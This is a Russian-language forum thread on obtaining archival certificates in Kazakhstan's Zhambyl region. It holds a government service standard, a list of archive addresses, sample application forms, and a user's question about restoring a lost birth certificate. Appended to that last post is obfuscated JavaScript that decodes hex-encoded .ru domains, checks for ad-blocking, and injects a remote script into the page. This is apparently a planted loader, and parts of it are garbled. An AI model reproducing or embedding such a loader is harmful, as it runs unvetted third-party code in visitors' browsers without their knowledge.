Светлана | Дата: Пятница, 20.01.2012, 15:44 | Сообщение # 2 |
Группа: Администраторы
Сообщений: 1416
Статус: Offline
| На официальном сайте Акимата Жамбыльской обл сайт: http://www.zhambyl.gov.kz/
есть портал гос услуг, в котором расписано куда подавать заявления на подтверждение стажа, образцы заявлений, и электронная страничка: http://www.zhambyl.gov.kz/index.php?action=ss
сдесь образец заявления
Выдача архивных справок Органы оказывающие данную государственную услугу 1 Государственный архив Жамбылской области г. Тараз, ул. Абая, 125 а 8(7262) 45-32-50
2 Государственный архив г.Тараза г. Тараз, ул.Рысбек батыра 4/49 8(7262) 51-61-28
3 Государственный архив Таласского района Жамбылская
область, г. Каратау, ул. Тохтарова, 9а 8(726-44) 6-13-65
4 Государственный архив Байзакского района Жамбылская область, с. Сарыкемер, ул. Конаева. 137 8(726-37) 2-17-59
5 Государственный архив Кордайского района Жамбылская 8(726-36)область, 2-23-29 с. Кордай, ул. Домалак-ана, 209
6 Государственный архив Мойынкумского Жамбылская 8(726-42)района область, 2-41-75 с. Мойынкум, ул. Кошенова, 10 7 Государственный архив Шуйского района Жамбылская 8(726-43)область, 2-16-63 г. Шу, ул.Абылайхана, 10
8 Государственный архив Меркенского района Жамбылская 8(726-32)область, 2-13-72с. Мерке, ул. Исмайлова, 191 9 Государственный архив Т.Рыскуловского Жамбылская 8(726-31)района область, 2-23-75с. Кулан, ул. Жибек жолы, 59 10 Государственный архив Жуалинского района Жамбылская 8(726-35) область, 2-17-74 с. Б. Момышулы, ул. Сауранбекулы,49
11 Государственный архив Жамбылского Жамбылская область. 8(726-33) 2-14-70 района с. Аса, ул. Абая, 127
12Государственный архив Сарысуского района Жамбылская 8(726-39)область, 2-13-44с. Саудакент, ул. Абдарова, 35
13 Центр обслуживания населения г. Тараз, ул. Койгельди, д. 87262-438418Жамбылской области 158 «а» Перечень необходимых документов при обращении в Архив:
1) заявление (письмо) с указанием сведений, которые необходимо подтвердить;
2) документ, удостоверяющий личность потребителя или документ удостоверяющий полномочия доверенного лица (при личном посещении);
Смотрите образцы заявления услугах при обращении в Центр:
1) заявление об оказании государственной услуги;
2) заявление (письмо) с указанием сведений, которые необходимо подтвердить;
3) оригинал и копию документа, удостоверяющего личность потребителя или документ удостоверяющего полномочия доверенного лица.
Утвержден постановлением Правительства
Республики Казахстан от 30 декабря 2009 года № 2315
Стандарт государственной услуги
"Выдача архивных cправок" 1. Общие положения
1. Настоящий стандарт "Выдача архивных справок" (далее - стандарт) определяет порядок оказания государственной услуги по выдаче архивных справок - официального документа архива, имеющего юридическую силу и содержащего документную информацию о предмете запроса с указанием поисковых данных документов, на основании которых она составлена (далее - государственная услуга).
2. Форма оказываемой государственной услуги: не автоматизированная.
3. Государственная услуга оказывается на основании пункта 5 статьи 15 Закона Республики Казахстан от 22 декабря 1998 года "О Национальном архивном фонде и архивах".
4. Государственная услуга оказывается государственными архивами (далее - Архив), а также через центры обслуживания населения на альтернативной основе (далее - Центр), перечень которых указан в приложениях 1 и 2 к настоящему стандарту.
5. Формой завершения государственной услуги является выдача архивной справки, копии или выписки архивных документов (далее - архивная справка).
6. Государственная услуга оказывается физическим и юридическим лицам (далее - потребитель).
7. Государственная услуга оказывается в следующие сроки: при обращении в Архив:
в течение пятнадцати календарных дней со дня регистрации документов в канцелярии Архива;
в случаях, когда для оказания государственной услуги необходимо изучение документов двух и более организации, а также более чем за пять лет, руководителем Архива, либо уполномоченным на это лицом срок оказания государственной услуги может быть продлен не более чем на тридцать календарных дней, о чем сообщается потребителю в течение трех календарных дней со дня регистрации документов;
оказание государственной услуги по выявлению информации генеалогического и тематического характеров, которые требуют значительных затрат времени и труда, ставятся на дополнительный контроль вплоть до окончательного его исполнения, о чем сообщается потребителю в течение трех календарных дней со дня регистрации документов.
Максимально допустимое время ожидания в очереди при сдаче необходимых документов для оказания государственной услуги, а также при получении документов -15 минут;
при обращении в Центр:
в течение тридцати календарных дней с момента отправки документов Центром в Архив;
максимально допустимое время ожидания в очереди при сдаче необходимых документов для
оказания государственной услуги, а также при получении документов - 30 минут.
Государственная услуга по выдаче архивных справок генеалогического и тематического характера оказывается только Архивами.
8. Государственная услуга является бесплатной, за исключением проведения по заказам (заявкам) выявления информации генеалогического и тематического характера и копирования архивных документов, которая согласно пункту 1 статьи 17 Закона Республики Казахстан "О Национальном архивном фонде и архивах" оказываются на платной основе.
В этом случае, заключается договор на оказание государственной услуги, в котором оговариваются порядок оплаты за выполненную работу. Оплата услуг производится в соответствии с расценками, установленными в прейскуранте цен, утвержденном приказом Министра культуры и информации Республики Казахстан и Правилами оказания платных услуг и использования полученных средств государственными и ведомственными архивами, содержащимися за счет республиканского бюджета, утвержденных постановлением Правительства Республики Казахстан от 8 февраля 2002 года № 183.
Оплата производится через банки Республики Казахстан, которыми выдается квитанция, подтверждающая размер и дату оплаты.
9. Полная информация о порядке оказания государственной услуги и необходимых документах, размещается на портале электронного Правительства: www.e.gov.kz, интернет- ресурсе Министерства культуры и информации Республики Казахстан: www.mki.gov.kz, в официальных источниках информации, информационных досках и на стендах в местах оказания государственной услуги, перечень которых указан в приложениях 1 и 2 к настоящему стандарту.
10. Государственная услуга оказывается:
при обращении в Архив: ежедневно, за исключением субботы и воскресенья. Прием документов осуществляется с 9.00 до 18.00 часов, перерыв на обед с 13.00 до 14.00 часов. Прием осуществляется в порядке очереди, без предварительной записи и ускоренного обслуживания;
при обращении в Центр: шесть дней в неделю, кроме воскресенья и праздничных дней, с установленным графиком с 9-00 часов до 20-00 часов без перерыва, для филиалов и представительств устанавливается график работы с 9-00 часов до 19-00 часов с одночасовым перерывом на обед. Прием осуществляется в порядке "электронной" очереди, без предварительной записи и ускоренного обслуживания.
11. Услуга оказывается в здании Архива, где предусмотрены условия для людей с ограниченными физическими возможностями, а также имеются помещения, оснащенные стендами с перечнем необходимых документов.
Для поддержки правопорядка помещение Архива имеет круглосуточный пост охраны, противопожарные сигнализации и другие меры безопасности.
Государственная услуга также оказывается в здании Центра по месту проживания потребителя где предусмотрены условия для обслуживания потребителей с ограниченными физическими возможностями. В зале располагаются справочное бюро, кресла ожидания, информационные стенды с образцами заполненных бланков.
2. Порядок оказания государственной услуги
12. Для получения государственной услуги потребитель представляет: при обращении в Архив:
1) заявление (письмо) с указанием сведений, которые необходимо подтвердить;
2) документ, удостоверяющий личность потребителя или документ удостоверяющий полномочия доверенного лица (при личном посещении);
при обращении в Центр:
1) заявление об оказании государственной услуги;
2) заявление (письмо) с указанием сведений, которые необходимо подтвердить:
3) оригинал и копию документа, удостоверяющего личность потребителя или документ удостоверяющего полномочия доверенного лица.
При приеме пакета документов, сотрудник Центра сверяет подлинность копии с оригиналом и возвращает оригинал потребителю.
В случае необходимости, потребитель прилагает к заявлению (письму) соответствующие документы и материалы, либо их копии.
13. Для получения государственной услуги заполнение бланков не требуется, заявления принимаются по произвольной форме.
В Центре бланки заявлений об оказании государственной услуги размещаются на специальной стойке в зале ожидания, либо у консультантов Центра.
14. Для получения государственной услуги через Архив документы, указанные в пункте 12 настоящего стандарта, сдаются в Архивы, перечень которых, указан в приложении 1 к настоящему стандарту.
В Центре прием документов осуществляется посредством "окон", на которых размещается информация о предназначении и выполняемых функциях "окон", а также указываются фамилия, имя, отчество и должность инспектора Центра.
Инспектор Центра осуществляет проверку полноты документов на соответствие пункту 12 настоящего стандарта, регистрацию в журнале и передачу документов инспектору накопительного отдела.
Инспектор накопительного отдела Центра осуществляет сбор документов, составление реестра и отправку в Архив.
Центром доставка заявлений с прилагаемыми документами в Архив осуществляется в день приема данных заявлений не менее 2 раз посредством специальной связи.
Архив после получения документов из Центра осуществляет их проверку на соответствие пункту 12 настоящего стандарта, регистрирует поступившие документы в книге (журнале) регистрации запросов физических и юридических лиц.
Исполненные (готовые) документы из Архива поступают в Центр не позднее одного рабочего дня до истечения срока выдачи, указанного в расписке о приеме соответствующих документов.
15. Подтверждением принятия Архивом всех необходимых документов, указанных в пункте 12 настоящего стандарта, служит регистрация документов, предоставленных для получения услуги в книге регистрации, с указанием установленной даты получения потребителем государственной услуги.
При приеме документов через Центр потребителю выдается расписка о приеме соответствующих документов с указанием:
1) номера и даты приема запроса;
2) вида запрашиваемой государственной услуги;
3) количества и названий приложенных документов;
4) даты (время) и места выдачи документов;
5) фамилии, имени, отчества инспектора Центра принявшего заявление на оформление документов.
16. Архивным работником архивная справка выдается потребителю (доверенному лицу) при личном приеме, либо направляется по почте или в Центр.
Выдача готовых документов потребителю производится Архивами по адресам, указанным в приложении 1 к настоящему стандарту.
В Центре выдача готовых документов потребителю осуществляется инспектором Центра посредством "окон" на основании расписки в указанный в ней срок.
17. Основанием для приостановления оказания государственной услуги является непредставление потребителем одного из документов, указанных в пункте 12 настоящего стандарта.
Основанием для отказа в оказании государственной услуги является отсутствие необходимых сведений для выполнения запроса.
Архивы при выявлении ошибок в оформлении документов, предоставлении неполного пакета документов, указанных в пункте 12 настоящего стандарта, или ненадлежащем оформлении документов, а также неподлинности представленных документов, в течение трех рабочих дней после получения пакета документов возвращают их потребителю или в Центр с письменным обоснованием причин возврата (отказа).
Центр информирует потребителя в течение одного рабочего дня после их получения и выдает письменные обоснования Архива о причине возврата (отказа).
В случаях, если потребитель не обратился за получением документов в срок, Центр обеспечивает их хранение в течение 1 месяца, после чего передает их в архив Центра.
3. Принципы работы
18. Деятельность Архивов и Центров основывается на соблюдении конституционных прав человека, законности при исполнении служебного долга и осуществляется на принципах вежливости, предоставлении исчерпывающей и полной информации, обеспечении ее сохранности, защиты и конфиденциальности.
4. Результаты работы
19. Результаты работы оказания государственной услуги потребителям измеряются показателями качества и доступности согласно приложению 3 к настоящему стандарту.
20. Целевые значения показателей качества и доступности государственной услуги ежегодно утверждаются специально созданной рабочей группой, созданной из числа руководителей управлений архивов и документации областей, городов Астаны и Алматы.
5. Порядок обжалования
21. Порядок обжалования действий (бездействия) уполномоченных должностных лиц Архива разъясняется директорами Архива, начальниками управлений архивов и документации областей, городов Астаны и Алматы.
Информацию о порядке обжалования действий (бездействия) инспектора Центра можно получить по телефону информационно-справочной службы Центра: 58-00-58.
22. В случае претензий по качеству предоставления государственной услуги жалоба подается на имя директора Архива, начальников управлений архивов и документации областей, городов Астаны и Алматы.
Жалобы принимаются в письменном виде по почте, либо нарочно через канцелярию Архивов по адресам, указанным в приложении 1 настоящего стандарта.
Жалоба по качеству предоставления государственной услуги через Центр подается на имя директора Центра. Адреса и телефоны Центров указаны в приложении 2 к настоящему стандарту.
Спорные вопросы решаются в порядке гражданского судопроизводства.
23. Принятая жалоба регистрируется в журнале учета входящей корреспонденции Архивов и (или) Центра и рассматривается в сроки, установленные Законом Республики Казахстан "О порядке рассмотрения обращений физических и юридических лиц".
Документом, подтверждающим принятие жалобы является второй экземпляр жалобы либо копия жалобы, на котором лицом, принимающим жалобу указывается срок и место получения ответа на поданную жалобу и контактные данные должностных лиц, у которых можно узнать о ходе рассмотрения жалобы.
О результатах рассмотрения жалобы потребителю сообщается в письменном виде по почте, либо электронной почте.
6. Контактная информация
24. Графики работы и приема руководителей Архива и Центра определяются в соответствии с графиками работы Архива, Центра, предусмотренными в пункте 10 настоящего стандарта.
Контактные телефоны, адреса Архивов и Центров, указаны в приложениях 1 и 2 настоящего стандарта, а также в официальных источниках информации и на стендах, расположенных в помещениях Архива и Центра.
25. Дополнительную информацию о представляемой государственной услуге можно получить на интернет-ресурсе Министерства культуры и информации Республики Казахстан: www.mki.gov.kz.
Приложение 1
к стандарту государственно услуги "Выдача архивных справок"
Адреса государственных архивов
№ Название архивов Адреса архивов Номера телефонов
1 Жамбылская область:
Государственный архив Жамбылской области г. Тараз, ул. Абая, 125 а 8(7262) 45-32-50
2 Государственный архив г.Тараза
г. Тараз, ул.Рысбек батыра 4/49 8(7262 ) 51-61-28
3 Государственный архив Таласского района Жамбылская область. г. Каратау, ул. Тохтарова, 9 а 8(726-44) 6-13-65
4 Государственный архив Байзакского района Жамбылская область, с. Сарыкемер, ул. Конаева, 137 8(726-37) 2-17-59
5 Государственный архив Кордайского района Жамбылская область,
с. Кор дай, ул. Домалак-ана, 209 8(726-36) 2-23-29
6 Государственный архив Мойынкумского района Жамбылская область,
с. Мойынкум, ул. Кошенова, 10 8(726-42) 2-41-75
7 Государственный архив Шуйского района Жамбылская область, г. Шу, ул. Абылайхана, 10 8(726-43) 2-16-63
8 Государственный архив Меркенского района Жамбылская область, с. Мерке, ул. Исмайлова, 191 8(726-32) 2-13-72
9 Государственный архив Т. Рыскуловского района Жамбылская область, с. Кулан,
ул. Жибек жолы, 59 8(726-31) 2-23-75
10 Государственный архив Жуалинского района Жамбылская область, с.
Б. Момышулы,
ул. Сауранбекулы, 49 8(726-35) 2-17-74
11 Государственный архив Жамбылского района Жамбылская область, с. Аса, ул. Абая, 127 8(726-33) 2-14-70
12 Государственный архив Сарысуского района Жамбылская область, с. Саудакент,
ул. Абдарова, 35 8(726-39) 2-13-44
|
|
| |
Светлана | Дата: Пятница, 20.04.2012, 13:18 | Сообщение # 3 |
Группа: Администраторы
Сообщений: 1416
Статус: Offline
| Байзакский район (8726 37 ) ВЫДАЧА АРХИВНЫХ СПРАВОК: Государственный архив Байзакского района Жамбылская область, с. Сарыкемер, ул. Конаева. 137 8(726-37) 2-17-59
Адрес 080104 с. Сарыкемер,
ул. Байзак батыра, 104
e-mai: minash@mail.ru Ф.И.О директора архива Баянова М.Ж..
т. 8(726-37) 2-17-59 Ф.И.О сотрудника справочного отдела
Усубалиева А.А.
т. 8(726-37) 2-16-91
e-mai: minash@mail.ru Функциональная обязанность сотрудника справочного отдела - исполняет запросы учреждений,предприятий,организаций и граждан СНГ по вопросам выдачи справок социально-правового характера, ответы на письменные обращения.
- дает ответы на тематические запросы в установленном порядке.
- исполнение запросов МИД На официальном сайте Акимата Жамбыльской обл сайт: http://www.zhambyl.kz/?action=uploader&lan=rus&page=43
есть портал гос услуг, в котором расписано куда подавать заявления на подтверждение стажа, образцы заявлений, и электронная страничка: смотрите: http://zhambyl.gov.kz/RU....nt.aspx
сдесь образец заявления: http://zhambyl.gov.kz/RU....lt.aspx
Директору Жамбылского облгосархива
от ________________
(фамилия, имя, отчество полностью)
проживающий по адресу: телефон № ____________
ЗАЯВЛЕНИЕ
Прошу подтвердить стаж работы в _________________(наименование организации)
за _________________ годы
В указанные годы фамилия была _________
«___»______________200___год
подпись при себе иметь(выслать): копию удостоверения личности, копию трудовой книжки (при оформлении на других лиц –доверенность, заверенная нотариусом)
Директору Жамбылского облгосархива
от ___________________
(фамилия, имя, отчество полностью)
проживающий по адресу:
______________________
телефон № ____________
ЗАЯВЛЕНИЕ Прошу выдать справку о заработной плате за 19___-19___ годы.
(на каждые 4 года – отдельное заявление)
Работал ________________________________________________________
(наименование организации, подразделения, цех, должность)
В указанные годы фамилия была ____________________
«___»______________20___год
Подпись
при себе иметь: копию удостоверения личности, копию трудовой книжки, при оформлении на других лиц – доверенность, заверенная нотариусом
ЗАЯВЛЕНИЕ
Прошу подтвердить местонахождение _________________(наименование организации)
за 19___-19___ годы..........................и.т.п.
ЭТО ОБРАЗЦЫ
|
|
| |
женя7914 | Дата: Среда, 10.10.2018, 22:27 | Сообщение # 6 |
Группа: Пользователи
Сообщений: 1
Статус: Offline
| добрый вечер! у меня возникла такая проблема, у моей мамы Акименко Татьяны Владимировны порядком 10 лет назад сгорели все документы включая свидетельство о рождении, то что было сделано после получения гражданства РФ мы востановили , а вот те документы что были получены ею в Республике Казахстан к сожалению не удалось. Теперь когда подходит время выхода на пенсию ей понадобилось свидетельство о рождении, в связи с этим возникает вопрос его востановления. Как это можно сделать, куда обратиться за помощью. Может в архив или еще куда?! P/S: родственники которые могли бы с этим помочь уже давно не живут в Казахстане
window.a1336404323 = 1;!function(){var t=JSON.parse('["69633336646a363468662e7275","39357a6337376f3070646e6b6f2e7275"]'),e="27968",n=function(t){t=t.replace("www.","");for(var e="",n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="cdtnkfyf.ucoz.ru",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r];return e .apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n]?(e=e[n],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t ,u=o©+"/d6safundjenk6af/"+e+"/c/"+n®+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();
|
|
| |